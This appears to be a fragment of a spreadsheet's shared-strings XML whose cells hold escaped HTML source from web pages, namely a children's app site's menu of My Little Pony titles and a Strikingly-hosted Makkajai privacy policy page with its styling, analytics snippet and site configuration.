    <t>My Little Pony: Pinkie Pie&amp;#8217;s Sister&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-455 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-cutie-pox/" class="fusion-background-highlight"&gt;&lt;span&gt;My Little Pony: Cutie Pox&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-441 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-twilights-kingdom/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Twilight&amp;#8217;s Kingdom&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-427 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/play-doh-seek-and-squish/" class="fusion-background-highlight"&gt;&lt;span&gt;Play-Doh: Seek and Squish&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-406 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-luna-eclipsed/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Luna Eclipsed&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-395 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-power-ponies/" class="fusion-background-highlight"&gt;&lt;span&gt;MY LITTLE PONY: Power Ponies&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-385 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/transformers-rescue-bots-sky-forest-rescue/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots Sky Forest Rescue&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-349 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-best-pet/" class="fusion-background-highlight"&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>MY LITTLE PONY: Best Pet&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-fluttershys-famous-stare/" class="f</t>
  </si>
  <si>
    <t>&lt;!-- Powered by Strikingly.com 4 (1) Apr 12, 2023 at 05:29--&gt;
&lt;!DOCTYPE html&gt;
&lt;html itemscope="" itemtype="http://schema.org/WebPage" lang="en" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#" xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;title&gt;Privacy Policy - makkajai | Fun Learning&lt;/title&gt;
&lt;meta content="text/html; charset=UTF-8" http-equiv="Content-Type"&gt;
&lt;meta content="width=device-width,initial-scale=1.0,user-scalable=yes,minimum-scale=1.0,maximum-scale=3.0" id="viewport" name="viewport"&gt;
&lt;meta content="#ffffff" name="theme-color"&gt;
&lt;style&gt;
  html,body{margin:0;padding:0}h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,cite,code,del,dfn,em,img,q,s,samp,small,strike,strong,sub,sup,tt,var,dd,dl,dt,li,ol,ul,fieldset,form,label,input,textarea,legend,button,table,caption,tbody,tfoot,thead,tr,th,td{margin:0;padding:0;border:0;font-weight:normal;font-style:normal;font-size:100%;line-height:1;font-family:inherit}table{border-collapse:collapse;border-spacing:0}ol,ul{list-style:none}q:before,q:after,blockquote:before,blockquote:after{content:""}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted}article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0;-ms-interpolation-mode:bicubic}nav,section,aside,article,figure,header,footer,hgroup{display:block;clear:both}a{text-decoration:none}nav ul,footer ul{list-style-type:none}html{font-size:14px;line-height:1}input::-webkit-input-placeholder{color:#c0c4c8}
&lt;/style&gt;
&lt;link rel="preconnect" media="screen" href="https://static-fonts-css.strikinglycdn.com" crossorigin="true"&gt;
&lt;style type="text/css"&gt;
  @font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:url(https://static-fonts.strikinglycdn.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw3aX8.ttf) format('truetype')}@font-face{font-family:Montserrat;font-style:normal;font-weight:700;src:url(https://static-fonts.strikinglycdn.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM73w3aX8.ttf) format('truetype')}#s-content.s-font-body-montserrat .s-font-body{font-family:montserrat,helvetica,sans-serif}#s-content.s-font-title-brandon .s-font-title{font-family:brandon-grotesque,brandon,martel-sans,helvetica,sans-serif}
&lt;/style&gt;
&lt;link rel="preload" media="screen" href="https://static-fonts-css.strikinglycdn.com/css?family=Montserrat:400,700|Lato:300,400,700,300italic,400italic,700italic&amp;amp;subset=latin,latin-ext" as="style"&gt;
&lt;link rel="preload" media="print" href="https://static-fonts-css.strikinglycdn.com/ css?family=Montserrat:400,700|Lato:300,400,700,300italic,400italic,700italic&amp;amp;subset=latin,latin-ext" as="style" onload="this.rel='stylesheet'"&gt;
&lt;noscript&gt;&lt;link rel="stylesheet" media="print" href="https://static-fonts-css.strikinglycdn.com/css?family=Montserrat:400,700|Lato:300,400,700,300italic,400italic,700italic&amp;amp;subset=latin,latin-ext" as="style" onload="this.media=&amp;#39;all&amp;#39;"&gt;&lt;/noscript&gt;
&lt;script&gt;!function(u){"use strict";function e(e,t,n){var r,o=u.document,a=o.createElement("link");if(t)r=t;else{var l=(o.body||o.getElementsByTagName("head")[0]).childNodes;r=l[l.length-1]}var i=o.styleSheets;a.rel="stylesheet",a.href=e,a.media="only x",function e(t){if(o.body)return t();setTimeout(function(){e(t)})}(function(){r.parentNode.insertBefore(a,t?r:r.nextSibling)});var d=function(e){for(var t=a.href,n=i.length;n--;)if(i[n].href===t)return e();setTimeout(function(){d(e)})};function s(){a.addEventListener&amp;&amp;a.removeEventListener("load",s),a.media</t>
  </si>
  <si>
    <t>CUSTOM_CODE_START --&gt;
&lt;style&gt;
.container .eight.columns {
    width: 250px;
}
.s-section.s-app-line-shadow:after {
    background: none;
}
@media (min-width: 992px) {
#section-f_a263adfd-e724-4e92-97f7-4d14a1378d52 .s-block .s-block-item.s-repeatable-item {
    max-width: 33%;
    float: left;
}
.container .six.columns {
    width: 70%;
}
}
.s-section.s-app-line-shadow {
    padding: 20px 0 0 0;
}
#player {
    width: 90%;
    height: 90%;
}
.s-nav-item {
  min-width: 100px;
  min-height: 50px;
  text-align: center;
  line-height: 50px;
  margin: 0px;
  padding: 0px;
}
#header-container .header-wrapper .nav-container li a {
  padding: 0px;
}
.s-nav li a span {
    color: white;
    font-weight:bold;
    padding: 5px;
}
.s-nav li:nth-child(1) {background-color:#7A3E48;}        
.s-nav li:nth-child(2) {background-color:#EECD86;}
.s-nav li:nth-child(3) {background-color:#E18942;}
.s-nav li:nth-child(4) {background-color:#B95835;}
.s-nav li:nth-child(5) {background-color:#3D3242;}
.s-nav li {
   opacity: 1;
    transition: opacity .5s ease-out;
    -moz-transition: opacity .5s ease-out;
    -webkit-transition: opacity .5s ease-out;
    -o-transition: opacity .5s ease-out;
}
.s-nav li:hover {
     opacity: .5;
}
/* .s-nav li</t>
  </si>
  <si>
    <t>: nth-child(5) a span {    color: #5e5f5f;} */
@media (min-width: 992px) {
div.s-image-wrapper {
     width: 200%;
} 
}
.im-checkout-btn {
  background: #963192;
  background-image: -webkit-linear-gradient(top, #963192, #662964);
  background-image: -moz-linear-gradient(top, #963192, #662964);
  background-image: -ms-linear-gradient(top, #963192, #662964);
  background-image: -o-linear-gradient(top, #963192, #662964);
  background-image: linear-gradient(to bottom, #963192, #662964);
  -webkit-border-radius: 28;
  -moz-border-radius: 28;
  border-radius: 28px;
  font-family: Arial;
  color: #ffffff;
  font-size: 20px;
  padding: 10px 30px</t>
  </si>
  <si>
    <t>10px 30px;
  text-decoration: none;
}
.im-checkout-btn:hover {
  background: #b83db4;
  background-image: -webkit-linear-gradient(top, #b83db4, #853584);
  background-image: -moz-linear-gradient(top, #b83db4, #853584);
  background-image: -ms-linear-gradient(top, #b83db4, #853584);
  background-image: -o-linear-gradient(top, #b83db4, #853584);
  background-image: linear-gradient(to bottom, #b83db4, #853584);
  text-decoration: none;
}
&lt;/style&gt;
&lt;!-- Hotjar Tracking Code for https://www.makkajai.com --&gt;
&lt;script&gt;
    (function(h,o,t,j,a,r){
        h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
        h._hjSettings={hjid:2075516,hjsv:6};
        a=o.getElementsByTagName('head')[0];
        r=o.createElement('script');r.async=1;
        r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
        a.appendChild(r);
    })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');
&lt;/script&gt;
&lt;!-- CUSTOM_CODE_END --&gt;
&lt;meta name="asset-url" content="https://static-assets.strikinglycdn.com"&gt;
&lt;script&gt;
  (function() {
    window.$B || (window.$B = {});
  }).call(this);
&lt;/script&gt;
&lt;script src="https://static-assets.strikinglycdn.com/detectIE-c385c24313ef0e9e4e7a1e131bf5e59f0fbd468f9f9ef44fd6739ae84ef0c0a4.js" async="async"&gt;&lt;/script&gt;
&lt;/head&gt;
 &lt;body class="show  locale-en" id="user_sites" theme_name="app"&gt;
&lt;div class="" data-id="17049177" id="s-page-container"&gt;
&lt;div data-hypernova-key="SiteBootstrapper" data-hypernova-id="57fe5594-93dd-4b53-96cf-a1d5c6021c4d" data-hypernova-emotion-id=""&gt;&lt;script&gt;window.ssrIsLoaded=true&lt;/script&gt;&lt;div id="s-page-client-container"&gt;&lt;div&gt;&lt;div id="s-content" class="s-variation-default  s-font-heading-montserrat s-font-title-brandon s-font-body-montserrat s-font-button-montserrat s-font-weight-heading-default s-font-weight-title-default s-font-weight-body-default s-font-weight-button-default s-entrance-mask" lang="en"&gt;&lt;div class="social-thumbnail"&gt;&lt;div style="display:none"&gt;&lt;img src="//user-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,h_630,w_1200,f_auto,q_90/191653/angry_maxx_ueciui.png" width="300" height="300" alt="thumbnail image"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;style id="color-style-tag"&gt;&lt;/style&gt;&lt;style id="font-style-tag"&gt;
    #s-content.s-font-body-montserrat .s-font-body {
      font-family: montserrat, helvetica, sans-serif;
    }
    #s-content.s-font-body-montserrat .s-font-body:lang(ja) {
      font-family: montserrat, helvetica, "ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",Osaka,"メイリオ",Meiryo,"ＭＳ Ｐゴシック","MS PGothic", sans-serif
    }
    #s-content.s-font-body-montserrat .s-font-body:lang(zh-cn),
    #s-content.s-font-body-montserrat .s-font-body:lang(sxl),
    #s-content.s-font-body-montserrat .s-font-body:lang(zh) {
      font-family: montserrat, helvetica, 'PingFang SC',"Microsoft YaHei","微软雅黑",STXihei,"华文细黑", sans-serif
    }
    #s-content.s-font-body-montserrat .s-font-body:lang(zh-tw) {
      font-family: montserrat, helvetica, 'Lisong Pro', 'PMingLiU', 'PingFang TC','Microsoft JhengHei',"微軟正黑體",STXihei, sans-serif;
    }
    #s-content.s-font-title-brandon .s-font-title {
      font-family: "brandon-grotesque", brandon, martel-sans, helvetica, sans-serif;
    }
    #s-content.s-font-title-brandon .s-font-title:lang(ja) {
      font-family: "brandon-grotesque", brandon, martel-sans, helvetica, "ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",Osaka,"メイリオ",Meiryo,"ＭＳ Ｐゴシック","MS PGothic", sans-serif
    }
    #s-content.s-font-title-brandon .s-font-title:lang(zh-cn),
    #s-content.s-font-title-brandon .s-font-title:lang(sxl),
    #s-content.s-font-title-brandon .s-font-title:lang(zh) {
      font-family: "brandon-grotesque", brandon, martel-sans, helvetica, 'PingFang SC',"Microsoft YaHei","微软雅黑",STXihei,"华文细黑", sans-serif
    }
    #s-content.s-font-title-brandon .s-font-title:lang(zh-tw) {
      font-family: "brandon-grotesque", brandon, martel-sans, helvetica, 'Lisong Pro', 'PMingLiU', 'PingFang TC','Microsoft JhengHei',"微軟正黑體",STXihei, sans-serif;
    }
    #s-content.s-font-heading-montserrat .s-font-heading {
      font-family: montserrat, helvetica, sans-serif;
    }
    #s-content.s-font-heading-montserrat .s-font-heading:lang(ja) {
      font-family: montserrat, helvetica, "ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",Osaka,"メイリオ",Meiryo,"ＭＳ Ｐゴシック","MS PGothic", sans-serif
    }
    #s-content.s-font-heading-montserrat .s-font-heading:lang(zh-cn),
    #s-content.s-font-heading-montserrat .s-font-heading:lang(sxl),
    #s-content.s-font-heading-montserrat .s-font-heading:lang(zh) {
      font-family: montserrat, helvetica, 'PingFang SC',"Microsoft YaHei","微软雅黑",STXihei,"华文细黑", sans-serif
    }
    #s-content.s-font-heading-montserrat .s-font-heading:lang(zh-tw) {
      font-family: montserrat, helvetica, 'Lisong Pro', 'PMingLiU', 'PingFang TC','Microsoft JhengHei',"微軟正黑體",STXihei, sans-serif;
    }
    #s-content.s-font-button-montserrat .s-font-button {
      font-family: montserrat, helvetica, sans-serif;
    }
    #s-content.s-font-button-montserrat .s-font-button:lang(ja) {
      font-family: montserrat, helvetica, "ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",Osaka,"メイリオ",Meiryo,"ＭＳ Ｐゴシック","MS PGothic", sans-serif
    }
    #s-content.s-font-button-montserrat .s-font-button:lang(zh-cn),
    #s-content.s-font-button-montserrat .s-font-button:lang(sxl),
    #s-content.s-font-button-montserrat .s-font-button:lang(zh) {
      font-family: montserrat, helvetica, 'PingFang SC',"Microsoft YaHei","微软雅黑",STXihei,"华文细黑", sans-serif
    }
    #s-content.s-font-button-montserrat .s-font-button:lang(zh-tw) {
      font-family: montserrat, helvetica, 'Lisong Pro', 'PMingLiU', 'PingFang TC','Microsoft JhengHei',"微軟正黑體",STXihei, sans-serif;
    }
  &lt;/style&gt;&lt;/div&gt;&lt;div class="s-navbar-section"&gt;&lt;div id="header-nav-spacer"&gt;&lt;/div&gt;&lt;div id="header-container" class="navigator"&gt;&lt;div class="container"&gt;&lt;div class="sixteen columns"&gt;&lt;div class="header-wrapper"&gt;&lt;div class="logo-container"&gt;&lt;div class="logo-image"&gt;&lt;div class="s-component s-image"&gt;&lt;div&gt;&lt;div class="s-component-content"&gt;&lt;div class="s-img-wrapper"&gt;&lt;a href="http://makkajai.com"&gt;&lt;img src="//custom-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,fl_lossy,h_300,w_300,f_auto,q_auto/191653/352015_308531.png" alt="" title="" class="crop-default" data-description="" data-image-link="http://makkajai.com"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="logo-text"&gt;&lt;div class="s-component s-text"&gt;&lt;div class=""&gt;&lt;div class="s-component-content s-font-title" style="white-space:pre-wrap"&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="nav-container"&gt;&lt;ul class="s-nav"&gt;&lt;span&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/"&gt;&lt;span class="s-font-body"&gt;Home&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/apps"&gt;&lt;span class="s-font-body"&gt;Apps&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/about-us"&gt;&lt;span class="s-font-body"&gt;About Us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/faqs"&gt;&lt;span class="s-font-body"&gt;FAQs&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/career"&gt;&lt;span class="s-font-body"&gt;Career&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="menu-dropdown"&gt;&lt;a class="s-nav-item" target="_self" href="/join-candidate-list"&gt;&lt;span class="s-font-body"&gt;Join candidate list&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="page-wrapper s-full-screen-page"&gt;&lt;div id="prerendered-inline-theme-html"&gt;&lt;/div&gt;&lt;ul style="display:block" class="slides s-page-6 "&gt;&lt;div&gt;&lt;li class="slide s-section-1 s-first-visible-section  s-only-one-section" id="section-f_44374b76-df52-4042-8adf-058206c6e593"&gt;&lt;div class="waypoint"&gt;&lt;/div&gt;&lt;div class="section-anchor"&gt;&lt;/div&gt;&lt;div class="lazyload  s-no-bg  s-html-section s-section   background-image" data-react-style="{}"&gt;&lt;div class="container"&gt;&lt;div class="columns sixteen"&gt;&lt;div class="s-title-group  "&gt;&lt;div class="s-title "&gt;&lt;div class="s-component s-text"&gt;&lt;div class=""&gt;&lt;div class="s-component-content s-font-title" style="white-space:pre-wrap"&gt;&lt;h1&gt;&lt;p&gt;Privacy Policy&lt;/p&gt;&lt;/h1&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div</t>
  </si>
  <si>
    <t>class="s-subtitle"&gt;&lt;div class="s-component s-text"&gt;&lt;div class=""&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="s-component s-html-component"&gt;&lt;div class="s-component-content-wrapper"&gt;&lt;div class="s-component-content s-font-body"&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/li&gt;&lt;/div&gt;&lt;/ul&gt;&lt;div id="prerendered-inline-theme-html"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="strikingly-tooltip-container"&gt;&lt;/div&gt;&lt;div class="lazyload   s-footer-section s-section has-new-mobile-actions   background-image" data-react-style="{}"&gt;&lt;div class="container s-layout-vertical"&gt;&lt;div class="columns sixteen "&gt;&lt;div&gt;&lt;div class="waypoint"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="s-footer-text"&gt;&lt;div class="s-component s-text"&gt;&lt;div class=""&gt;&lt;div class="s-component-content s-font-body" style="white-space:pre-wrap"&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;&lt;a href="http://www.makkajai.com/about-us"&gt;About Us&lt;/a&gt; | &lt;a href="http://www.makkajai.com/contact"&gt;Contact Us&lt;/a&gt; | &lt;a href="http://www.makkajai.com/privacy-policy"&gt;Privacy Policy&lt;/a&gt;&lt;span&gt; |&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;a href="http://www.makkajai.com /terms"&gt;Terms &amp;amp; Conditions&lt;/a&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>© Makkajai Edu Tech Pvt. Ltd. 2019&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="s-footer-logo-wrapper" style="width:100%"&gt;&lt;/div&gt;&lt;div id="ecommerce-drawer" class="s-category-drawer-wrapper"&gt;&lt;/div&gt;&lt;div id="blog-category-drawer" class="s-category-drawer-wrapper"&gt;&lt;/div&gt;&lt;div class="s-floated-components"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;div id="s-ecommerce-shopping-cart-wrapper" class="s-ecommerce-shopping-cart-wrapper no-cart"&gt;&lt;/div&gt;&lt;div id="fixedContainer"&gt;&lt;div id="fixedLoginContainer" class="fixed-login-container"&gt;&lt;/div&gt;&lt;div id="fixedMultiLangSwitcher" class="fixed-multi-lang-container"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="s-new-mobile-actions-wrapper" class=""&gt;&lt;ul class="s-mobile-actions clearfix s-font-body"&gt;&lt;a class="s-mobile-actions-item padding-adapting less-than-three one-item" href="mailto:support@makkajai.com" target="" style="width:100%;display:block"&gt;&lt;div class="s-mobile-actions-item-icon"&gt;&lt;i class="entypo-mail"&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="s-mobile-actions-item-text"&gt;Contact&lt;/div&gt;&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;script class="script-loader"&gt;(function(){var</t>
  </si>
  <si>
    <t>initScrollData = function(){window.cachedScrollData=null,window.ssrScrollListener=function(){window.cachedScrollData={top:window.scrollY,left:0}},window.addEventListener("scroll",window.ssrScrollListener)}; initScrollData();})()&lt;/script&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id="fb-root"&gt;&lt;/div&gt;
&lt;div id="app-script-root"&gt;&lt;/div&gt;
&lt;div id="app-view-root"&gt;&lt;/div&gt;
&lt;div class="s-cookie-notification-bar" style="position: fixed; bottom: -1000px !important;"&gt;
&lt;div class="cookie-notification-title"&gt;Cookie Use&lt;/div&gt;
&lt;span class="cookie-notification-text"&gt;We use cookies to ensure a smooth browsing experience.   By continuing we assume you accept the use of cookies.&lt;/span&gt;
&lt;div&gt;
&lt;button&gt;Accept&lt;/button&gt;
&lt;/div&gt;
&lt;a href="./pages/cookie-policy" target="_blank"&gt;Learn More&lt;/a&gt;
&lt;/div&gt;
&lt;script src="//ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js" defer="defer"&gt;&lt;/script&gt;
&lt;!-- removing_gon has activated 100%, so we add not_removing_gon rollout for specific user --&gt;
&lt;script&gt;
//&lt;![CDATA</t>
  </si>
  <si>
    <t>[
window.$S={};$S.global_conf={"premium_apps":["HtmlApp","EcwidApp","MailChimpApp","CeleryApp","LocuApp"],"environment":"production","env":"production","host_suffix":"strikingly.com","asset_url":"https:\/\/static-assets.strikinglycdn.com","locale":"en","in_china":false,"country_code":null,"browser_locale":null,"is_sxl":false,"china_optimization":false,"enable_live_chat":true,"user_image_cdn":{"qn":"\/\/user-assets.sxlcdn.com","s":"\/\/custom-images.strikinglycdn.com"},"GROWINGIO_API_KEY":null,"BAIDU_API_KEY":null,"SEGMENTIO_API_KEY":"eb3txa37hi","FACEBOOK_APP_ID":"138736959550286","WECHAT_APP_ID":null,"WECHAT_MP_APP_ID":"","KEEN_IO_PROJECT_ID":"5317e03605cd66236a000002","KEEN_IO_WRITE_KEY":"efd460f8e282891930ff1957321c12b64a6db50694fd0b4a01d01f347920dfa3ce48e8ca249b5ea9917f98865696cfc39bc6814e4743c39af0a4720bb711627d9cf0fe63d5d52c3866c9c1c3178aaec6cbfc1a9ab62a3c9a827d2846a9be93ecf4ee3d61ebee8baaa6a1d735bff6e37b","FIREBASE_URL":"bobcat.firebaseIO.com","CLOUDINARY_CLOUD_NAME":"hrscywv4p","CLOUDINARY_PRESET":"oxbxiyxl","rollout":{"background_for_all_sections":false,"crm_livechat":true,"stripe_payer_email":false,"stripe_alipay":true,"stripe_wechatpay":true,"stripe_afterpay":true,"stripe_klarna":true,"paynow_unionpay":true,"tw_payment_registration_upgrade":false,"new_checkout_design":true,"checkout_form_integration":true,"new_section_selector":true,"new_section_selector_2023":true,"s6_feature":true,"advanced_section_layout_setting":true,"google_invisible_recaptcha":true,"show_dummy_data_in_editor":true,"show_dummy_data_in_cro_editor":true,"domain_connection_v2":true,"new_blog_editor":true,"new_blog_editor_disabled":false,"draft_editor":true,"disable_draft_editor":false,"new_blog_layout":true,"new_store_layout":true,"gallery_section_2021":true,"strikingly_618":false,"nav_2021":true,"nav_2021_off":false,"pbs_i18n":true,"support_sca":false,"show_kickstart_entry_in_dashboard_support_widget":true,"need_html_custom_code_review":true,"has_hydrated_sections":false,"show_support_widget_in_live_site":false,"wechat_sharing":false,"new_wechat_oauth":false,"midtrans_payments":false,"pbs_variation_b":true,"all_currencies":true},"cookie_categories":{"necessary":["_claim_popup_ref","member_name","authenticationToken","_pbs_i18n_ab_test","__strk_cookie_notification","__is_open_strk_necessary_cookie","__is_open_strk_analytics_cookie","__is_open_strk_preferences_cookie","site_id","crm_chat_token","authenticationToken","member_id","page_nocache","page_password","page_password_uid","return_path_after_verification","return_path_after_page_verification","is_submitted_email"],"preferences":["__strk_cookie_comment_name","__strk_cookie_comment_email"],"analytics":["__strk_session_id"]},"WEITIE_APP_ID":null,"WEITIE_MP_APP_ID":null,"BUGSNAG_FE_API_KEY":"","google":{"recaptcha_v2_client_key":"6LeRypQbAAAAAGgaIHIak2L7UaH4Mm3iS6Tpp7vY","recaptcha_v2_invisible_client_key":"6LdmtBYdAAAAAJmE1hETf4IHoUqXQaFuJxZPO8tW"},"honeypot":"honeypot"};$S.app_instances=[];$S.nav=[{"name":"\/about-us","uid":"883fa169-f39b-4326-9379-c260a369d9fc","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/apps","uid":"811ff034-a251-46dc-b1bd-22663620a384","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/contact","uid":"f8dc92d8-3f9e-44d4-9fbd-ea79987b394c","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/purchase-thank-you","uid":"eee54385-2d35-4dd2-bff3-83b00b77acca","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/terms","uid":"c19243bc-686a-40c0-8f6a-fdcdce91b575","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/privacy-policy","uid":"4c14af3f-37d9-4d6a-9c3a-6d4ed92ecc00","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/press-kit","uid":"1685d9e5-18e3-4038-818c-4dd5e4df385f","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/home","uid":"f2263fa0-a1bf-49c2-a812-066afe5be860","memberOnly":false,"hasPassword":false,"isHomePage":true},{"name":"\/games","uid":"d2fa5f39-9156-417d-8ba3-e748458e2d16","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/faqs","uid":"49cad3b3-bb48-4092-8ef3-7efa9d612574","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/career","uid":"4e46108c-6ddc-4e1e-a60e-9d2a399d8114","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/full-stack-developer","uid":"d2e4b6fa-09e5-4773-92b4-9521487e4ea0","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/aso-expert","uid":"2e71d474-b723-484f-b157-ff0b752cfd78","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/art-director","uid":"1b458ea3-ee93-4864-8b08-4144e23fc219","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/china-aso","uid":"e7e4d21b-01dd-480c-8be1-ead7353aa0fd","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/talk-to-us","uid":"5826bb98-85ea-4209-a266-14c438e5e096","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/playtest-multiplication","uid":"de47889f-57a7-4c11-b187-32ee86e8cad4","memberOnly":false,"hasPassword":false,"isHomePage":false},{"name":"\/join-candidate-list","uid":"c961c9d8-2321-4ee2-a820-7930e5d0e2f6","memberOnly":false,"hasPassword":false,"isHomePage":false}];$S.conf={"SUPPORTED_CURRENCY":[{"code":"AED","symbol":"\u062f.\u0625","decimal":". ","thousand":",","precision":2,"name":"United Arab Emirates Dirham"},{"code":"AFN","symbol":"\u060b","decimal":".","thousand":",","precision":2,"name":"Afghan afghani"},{"code":"ALL","symbol":"Lek","decimal":",","thousand":".</t>
  </si>
  <si>
    <t>","precision":2,"name":"Albanian lek"},{"code":"AMD","symbol":"\u058f","decimal":",","thousand":". ","precision":2,"name":"Armenian dram"},{"code":"ANG","symbol":"\u0192","decimal":",","thousand":". ","precision":2,"name":"Netherlands Antillean guilder"},{"code":"AOA","symbol":"Kz","decimal":",","thousand":".</t>
  </si>
  <si>
    <t>","precision":2,"name":"Angolan kwanza"},{"code":"ARS","symbol":"$","decimal":",","thousand":". ","precision":2,"name":"Argentine peso"},{"code":"AUD","symbol":"A$","decimal":". ","thousand":" ","precision":2,"name":"Australian Dollar"},{"code":"AWG","symbol":"\u0192","decimal":".</t>
  </si>
  <si>
